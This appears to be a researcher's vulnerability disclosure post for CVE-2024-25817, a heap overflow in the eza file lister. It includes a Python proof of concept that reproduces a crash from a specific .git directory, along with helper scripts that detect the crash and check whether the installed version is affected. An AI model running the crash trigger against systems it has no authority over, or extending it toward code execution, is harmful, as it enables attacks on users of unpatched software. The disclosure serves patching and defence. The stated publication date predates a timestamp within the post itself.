CVE-2024-25817
2024-02-07
2024-06-08

Summary

In eza [1] (before v0.18.11) there is a heap-overflow vulnerability related to the handling of a .git directory. It was first observed on an Ubuntu for Raspberry Pi system running the ubuntu-raspi kernel.

Details

The overflow is triggered by the .git directory of some repositories. The exact trigger appears to depend on specific files and on the directory layout; the files and folders that seem to be involved are .git/HEAD, .git/refs, and .git/objects.

PoC (if you have a Raspberry Pi 4B bare-metal machine)

If you don't have a bare-metal Raspberry Pi, you can try emulating an Ubuntu for Raspberry Pi system in a virtual machine.

You just need to install any of the Ubuntu for Raspberry Pi series systems on your bare-metal machine.

Tested platform info

Configuration of the Raspberry Pi 4B bare-metal machine:

eza version: v0.18.10 [+git]
Linux lux 5.15.0-1049-raspi #52-Ubuntu SMP PREEMPT Thu Mar 14 08:39:42 UTC 2024 aarch64 aarch64 aarch64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 22.04.4 LTS
Release: 22.04
Codename: jammy
WARNING: So far I have only tested Ubuntu 22.04.4 LTS Server and confirmed that the vulnerability exists there. I haven't tested other systems or Raspberry Pi models yet.

Steps

Install eza (<= v0.18.10) on the Raspberry Pi; the installation process is described in the official wiki. Then run the following script:

#!/usr/bin/env python3
import os
import shutil
import subprocess

# Step 1: Clone the repository
repo_url = "https://github.com/umami-software/umami.git"
subprocess.run(["git", "clone", repo_url], check=True)

# Step 2: Check out the specific commit whose '.git' directory triggers the vulnerability
repo_dir = "umami"
commit_hash = "a38baa5"
os.chdir(repo_dir)
subprocess.run(["git", "checkout", commit_hash], check=True)

# Step 3: Create a directory that holds only the vulnerability-related files
os.chdir("..")
os.mkdir("suspicious")
shutil.move(os.path.join(repo_dir, ".git"), "suspicious/.git")

# Step 4: Remove the unrelated files/directories (the working tree)
shutil.rmtree(repo_dir)

# Step 5: Trigger the vulnerability (this invocation is the one expected to crash)
subprocess.run(["eza", "-l", "--git", "suspicious/.git"])
NOTE: The picture shows my test environment. In actual testing, the vulnerability can be triggered just by running the script above.
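To confirm a crash without relying on a screenshot, the following harness (an added example, my code and not part of the original post or of eza) runs the trigger command and classifies its exit status. On POSIX, subprocess.run reports a child killed by a signal as the negated signal number, so SIGSEGV or SIGABRT can be told apart from a clean exit or an ordinary error. The command line is the one from the script above; the relative path "suspicious/.git" is assumed to be the directory that script creates.

```python
#!/usr/bin/env python3
import shutil
import signal
import subprocess
import sys

# Command from the PoC script above. "suspicious/.git" is the directory that
# script creates, referenced here as an assumed relative path.
TRIGGER_CMD = ["eza", "-l", "--git", "suspicious/.git"]


def classify_exit(returncode: int) -> str:
    """Map a subprocess return code to a human-readable verdict.

    On POSIX, subprocess reports a signal-terminated child as the negated
    signal number: -11 is SIGSEGV, -6 is SIGABRT (what a Rust panic or an
    allocator abort usually produces). Anything else is a normal exit.
    """
    if returncode < 0:
        try:
            name = signal.Signals(-returncode).name
        except ValueError:
            name = f"signal {-returncode}"
        return f"crashed: {name}"
    if returncode == 0:
        return "ok"
    return f"exited with status {returncode}"


def is_crash(verdict: str) -> bool:
    """True when the verdict came from a signal-terminated process."""
    return verdict.startswith("crashed:")


def run_trigger(cmd=TRIGGER_CMD, timeout=30) -> str:
    """Run the trigger command and return a verdict string."""
    try:
        proc = subprocess.run(cmd, capture_output=True, timeout=timeout)
    except FileNotFoundError:
        return f"not run: {cmd[0]} not installed"
    except subprocess.TimeoutExpired:
        return "not run: timed out"
    return classify_exit(proc.returncode)


if __name__ == "__main__":
    if shutil.which("eza") is None:
        sys.exit("eza not found on PATH")
    verdict = run_trigger()
    print(verdict)
    # Exit non-zero when the binary crashed, so the result can drive a script.
    sys.exit(1 if is_crash(verdict) else 0)
```

Run it from the directory in which the PoC script was executed, after that script has created "suspicious/.git"; a fixed eza prints "ok" or an ordinary exit status, while an affected build should report a signal.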

Impact

Arbitrary code execution.

Severity using CVSS

Severity: High (8.4)
Vector string: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

  • Heap-based Buffer Overflow (CWE-122)
  • Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119)
  • Missing Release of Memory after Effective Lifetime (CWE-401)
  • Improper Resource Shutdown or Release (CWE-404)
  • Improper Initialization (CWE-665)

GitHub Advisories

  • GitHub Advisories [2]

NIST

  • National Vulnerability Database [3]

Solution

Update eza to version 0.18.11 or later.
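To check whether an installed eza is still in the affected range, the following added example (my code, not eza's or the original post's) parses the version line from `eza --version` and compares it against the first fixed release as an integer tuple. The sample output below is constructed, modelled on the "v0.18.10 [+git]" line in the tested-platform block above; the regex does not depend on the rest of the banner text.

```python
#!/usr/bin/env python3
import re
import subprocess
from typing import Optional, Tuple

# First fixed release, from the advisory on this page.
FIXED_VERSION = (0, 18, 11)

# Constructed samples of `eza --version` output, shaped after the
# "v0.18.10 [+git]" line shown in the tested-platform block (assumed layout).
SAMPLE_VULNERABLE = "eza - A modern, maintained replacement for ls\nv0.18.10 [+git]\n"
SAMPLE_FIXED = "eza - A modern, maintained replacement for ls\nv0.18.11 [+git]\n"

# Matches the first x.y.z triple, with or without a leading "v".
_VERSION_RE = re.compile(r"\bv?(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract the first x.y.z version triple from --version output, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def is_affected(version: Tuple[int, int, int]) -> bool:
    """Integer tuples compare numerically, so 0.18.9 < 0.18.11 holds here,
    whereas a plain string comparison would get that case wrong."""
    return version < FIXED_VERSION


def check_installed(eza: str = "eza") -> str:
    """Query the installed binary and report whether it needs the upgrade."""
    try:
        proc = subprocess.run([eza, "--version"], capture_output=True,
                              text=True, timeout=10)
    except FileNotFoundError:
        return "eza not installed"
    v = parse_version(proc.stdout)
    if v is None:
        return "could not parse eza version"
    dotted = ".".join(map(str, v))
    if is_affected(v):
        return f"eza {dotted}: affected by CVE-2024-25817, upgrade to 0.18.11 or later"
    return f"eza {dotted}: not affected"


if __name__ == "__main__":
    print(check_installed())
```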

Footnotes

  1. eza: A modern, maintained replacement for ls.

  2. GitHub Advisories

  3. CVE-2024-25817 (https://nvd.nist.gov/vuln/detail/CVE-2024-25817)

Author: CuB3y0nd
Published at: 2024-02-07
Source: https://assembly.rip/posts/my-cves/eza-cve-report/